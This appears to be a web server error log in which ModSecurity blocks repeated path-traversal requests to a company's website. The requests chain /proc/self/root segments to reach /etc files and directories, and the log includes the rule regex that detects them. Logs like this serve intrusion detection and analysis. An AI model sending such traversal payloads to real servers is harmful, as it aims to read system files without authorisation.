[Tue Mar 17 08:56:24.366967 2026] [:error] [pid 7437:tid 140411607643904] [client 74.7.243.203:54440] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBaAeiSKl8TjouI-b9eQAAA9A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:56:25.639557 2026] [:error] [pid 1961:tid 140411691570944] [client 74.7.241.46:39470] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBaXRXaaWotPICgYsgRwAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:56:26.952880 2026] [:error] [pid 11469:tid 140411733534464] [client 74.7.241.46:39484] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBapDEJR9VXonE_-1JPwAAAQE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:56:28.157771 2026] [:error] [pid 2305:tid 140411616036608] [client 74.7.241.46:47616] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBbAQohV2v-7oj5HH2egAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:56:32.087762 2026] [:error] [pid 2473:tid 140411557287680] [client 74.7.243.203:55632] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBb6BJNF7axNlVR0X4cgAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:56:33.176538 2026] [:error] [pid 11469:tid 140411540502272] [client 74.7.241.46:47630] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBcZDEJR9VXonE_-1JRQAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:56:34.451688 2026] [:error] [pid 11469:tid 140411582465792] [client 74.7.243.203:53476] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBcpDEJR9VXonE_-1JSQAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:56:36.653526 2026] [:error] [pid 2325:tid 140411725141760] [client 74.7.241.46:47642] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBdO82sZHvlq4xgHq-mwAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:56:38.999369 2026] [:error] [pid 2305:tid 140411666392832] [client 74.7.241.46:47654] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBdgQohV2v-7oj5HH2fQAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:56:42.671654 2026] [:error] [pid 2305:tid 140411725141760] [client 74.7.241.46:58014] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBegQohV2v-7oj5HH2gQAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:56:45.171823 2026] [:error] [pid 1210:tid 140411674785536] [client 74.7.241.46:58022] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBfVKJy4A1bGlmj9BQkQAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:56:46.451422 2026] [:error] [pid 2325:tid 140411691570944] [client 74.7.241.46:58024] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBfu82sZHvlq4xgHq-pQAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:56:47.778867 2026] [:error] [pid 1961:tid 140411666392832] [client 74.7.241.46:58028] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBf3RXaaWotPICgYsgTwAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:56:52.907338 2026] [:error] [pid 7000:tid 140411599251200] [client 74.7.241.46:60900] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBhBePVOt35XCGZP8reAAAA5E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:57:05.536278 2026] [:error] [pid 11469:tid 140411716749056] [client 74.7.243.203:53484] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBkZDEJR9VXonE_-1JaAAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:57:07.516521 2026] [:error] [pid 7437:tid 140411548894976] [client 74.7.241.46:60916] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBkweiSKl8TjouI-b9igAAA9c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:57:10.157280 2026] [:error] [pid 11293:tid 140411590858496] [client 74.7.243.203:59210] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBltCmCSWTlPouqorG3QAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:57:10.946277 2026] [:error] [pid 1210:tid 140411699963648] [client 74.7.241.46:60904] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBllKJy4A1bGlmj9BQoAAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:57:12.806611 2026] [:error] [pid 2305:tid 140411733534464] [client 74.7.243.203:34908] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBmAQohV2v-7oj5HH2hgAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:57:15.499340 2026] [:error] [pid 1016:tid 140411641214720] [client 74.7.243.203:34918] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/subgid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBm5qmL8PQht4WJFlClAAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:57:16.890035 2026] [:error] [pid 1961:tid 140411565680384] [client 74.7.243.203:34924] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBnHRXaaWotPICgYsgWgAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
